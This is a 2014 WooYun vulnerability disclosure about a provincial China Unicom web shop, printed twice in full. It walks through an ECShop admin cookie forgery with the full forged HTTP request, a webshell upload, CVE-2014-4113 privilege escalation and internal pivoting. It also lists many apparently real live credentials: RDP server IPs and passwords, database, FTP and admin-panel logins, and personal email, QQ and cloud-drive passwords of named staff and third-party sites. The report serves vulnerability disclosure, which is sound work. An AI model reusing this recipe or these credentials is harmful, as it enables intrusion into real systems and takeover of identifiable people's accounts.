当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-085776

漏洞标题:某省联通网上商城网站漏洞信息泄露+可getshell+可提权+运维不当导致多台服务器沦陷

相关厂商:中国联通

漏洞作者: CTAA

提交时间:2014-12-04 09:49

修复时间:2015-01-18 09:50

公开时间:2015-01-18 09:50

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-04: 细节已通知厂商并且等待厂商处理中
2014-12-09: 厂商已经确认,细节仅向厂商公开
2014-12-19: 细节向核心白帽子及相关领域专家公开
2014-12-29: 细节向普通白帽子公开
2015-01-08: 细节向实习白帽子公开
2015-01-18: 细节向公众公开

简要描述:

某省联通网上商城网站漏洞信息泄露+可getshell+可提权

详细说明:

网站备份文件:http://yn10010.com/www.rar
网站采用ecshop,从数据库备份目录得知管理员账号密码
'admin', 'cmd@yninfo.com', '3aca82f963b5acad569466b72f86da70'
通过ecshop可伪造cookie(hash:31693422540744c0a6b6da635b7a5a93)
md5(3aca82f963b5acad569466b72f86da7031693422540744c0a6b6da635b7a5a93)
得到cookie验证的md5:5881243f0e42ebee05eca144ae88545d

GET /mymanage/index.php HTTP/1.1
Host: yn10010.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ECSCP[admin_id]=1; ECSCP[admin_pass]=5881243f0e42ebee05eca144ae88545d;ECS[visit_times]=2; ECS_ID=e4ad4c650ef82ef53ff93cd5149098c531ce8dc8; bdshare_firstime=1376041144528


伪造cookie,成功登录后台。

1.jpg


插入一句话木马。

2.jpg


cve2014-4113提升权限。

3.png


部分相关服务器信息:

4.png


5.png


6.png


7.png


由于是站库分离,还可以对内网数据库服务器进一步渗透。

$db_host   = "192.168.100.103:3306";
// database name
$db_name = "mophone";
// database username
$db_user = "mophone";
// database password
$db_pass = "mophone0871";//yn100100871


登录服务器
网站服务器
14.204.75.157:3390
用户:Administrator
密码:Adminmophone)*&!kms
数据库服务器
14.204.75.157:3392
用户:Administrator
密码:Adminpolice)*&!kms
数据库
链接名:yn10010
主机名:192.168.100.103
端口:3306
账号:mophone
密码:mophone0871
跳转专用
服务器IP:116.55.248.41:6008
登录帐号:administrator
登录密码:palmlink)*&!KMS
网站后台:
http://yn10010.com/mymanage/
admin:houtaimimi123
zhangzhongkai:134...zzk
流量统计
tongji.baidu.com
mophone:mophone0871
ecshop 论坛
账号:kerson_zhang : 20132014
考勤 zhangzhongkai :1347555432
企业邮箱 zhangzhongkai : 134zzk
网站超级管理员
admin mophonezzk
还有几个其他网站躺枪。
云主机
wd控制面板
http://www.west263.com/faq/list.asp?unid=514
ttche5125339
TTche!QAZ
ttcheVP0928
远程桌面
118.123.17.246:51400
Administrator
GgYy!2#4
TTcheYc0928
FTP:
118.123.17.246:51421
user:ttche
pass:TTche@YSH
ttcheFP0928
qq邮箱:ttche@qq.com 1347555432zzk
qq号:2564689342
360云盘 ttche@qq.com 1347555432zzk
后台管理
http://www.ttche.com
user:admin
pass:ggYY!@34
ttcheAd0927
ttche:TTche@YSH
一些内网相关:
管家婆服务器地址:192.168.1.250:9060 http://jxctop.gnway.cc:9060/jxcTop/
账号:administrator
密码:mophone
金万维域名:
jxctop
mophone
管家婆电话:65107288
手机补贴充值:www.1kuaifu.com
账号:1347555432@qq.com
密码:1347555432zk
http://tongji.baidu.com/web/welcome/login
mophone
mophone0871
漏洞信息太多(企业通讯录,短信接口,联通接口)……不一一列出

漏洞证明:

网站备份文件:http://yn10010.com/www.rar
网站采用ecshop,从数据库备份目录得知管理员账号密码
'admin', 'cmd@yninfo.com', '3aca82f963b5acad569466b72f86da70'
通过ecshop可伪造cookie(hash:31693422540744c0a6b6da635b7a5a93)
md5(3aca82f963b5acad569466b72f86da7031693422540744c0a6b6da635b7a5a93)
得到cookie验证的md5:5881243f0e42ebee05eca144ae88545d

GET /mymanage/index.php HTTP/1.1
Host: yn10010.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ECSCP[admin_id]=1; ECSCP[admin_pass]=5881243f0e42ebee05eca144ae88545d;ECS[visit_times]=2; ECS_ID=e4ad4c650ef82ef53ff93cd5149098c531ce8dc8; bdshare_firstime=1376041144528


伪造cookie,成功登录后台。

1.jpg


插入一句话木马。

2.jpg


cve2014-4113提升权限。

3.png


部分相关服务器信息:

4.png


5.png


6.png


7.png


由于是站库分离,还可以对内网数据库服务器进一步渗透。

$db_host   = "192.168.100.103:3306";
// database name
$db_name = "mophone";
// database username
$db_user = "mophone";
// database password
$db_pass = "mophone0871";//yn100100871


登录服务器
网站服务器
14.204.75.157:3390
用户:Administrator
密码:Adminmophone)*&!kms
数据库服务器
14.204.75.157:3392
用户:Administrator
密码:Adminpolice)*&!kms
数据库
链接名:yn10010
主机名:192.168.100.103
端口:3306
账号:mophone
密码:mophone0871
跳转专用
服务器IP:116.55.248.41:6008
登录帐号:administrator
登录密码:palmlink)*&!KMS
网站后台:
http://yn10010.com/mymanage/
admin:houtaimimi123
zhangzhongkai:134...zzk
流量统计
tongji.baidu.com
mophone:mophone0871
ecshop 论坛
账号:kerson_zhang : 20132014
考勤 zhangzhongkai :1347555432
企业邮箱 zhangzhongkai : 134zzk
网站超级管理员
admin mophonezzk
还有几个其他网站躺枪。
云主机
wd控制面板
http://www.west263.com/faq/list.asp?unid=514
ttche5125339
TTche!QAZ
ttcheVP0928
远程桌面
118.123.17.246:51400
Administrator
GgYy!2#4
TTcheYc0928
FTP:
118.123.17.246:51421
user:ttche
pass:TTche@YSH
ttcheFP0928
qq邮箱:ttche@qq.com 1347555432zzk
qq号:2564689342
360云盘 ttche@qq.com 1347555432zzk
后台管理
http://www.ttche.com
user:admin
pass:ggYY!@34
ttcheAd0927
ttche:TTche@YSH
一些内网相关:
管家婆服务器地址:192.168.1.250:9060 http://jxctop.gnway.cc:9060/jxcTop/
账号:administrator
密码:mophone
金万维域名:
jxctop
mophone
管家婆电话:65107288
手机补贴充值:www.1kuaifu.com
账号:1347555432@qq.com
密码:1347555432zk
http://tongji.baidu.com/web/welcome/login
mophone
mophone0871
漏洞信息太多(企业通讯录,短信接口,联通接口)……不一一列出

修复方案:

删除备份,关注相关使用的代码,出现漏洞及时修复!运维人员切记不要将账号密码放在网盘!或者以一定加密方式存放

版权声明:转载请注明来源 CTAA@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-12-09 08:27

厂商回复:

CNVD确认并复现所述第一层安全风险(后续引述,不直接测试),已经转由CNCERT下发给云南分中心,由其后续基础电信运营企业处置。

最新状态:

暂无


漏洞评价:

评论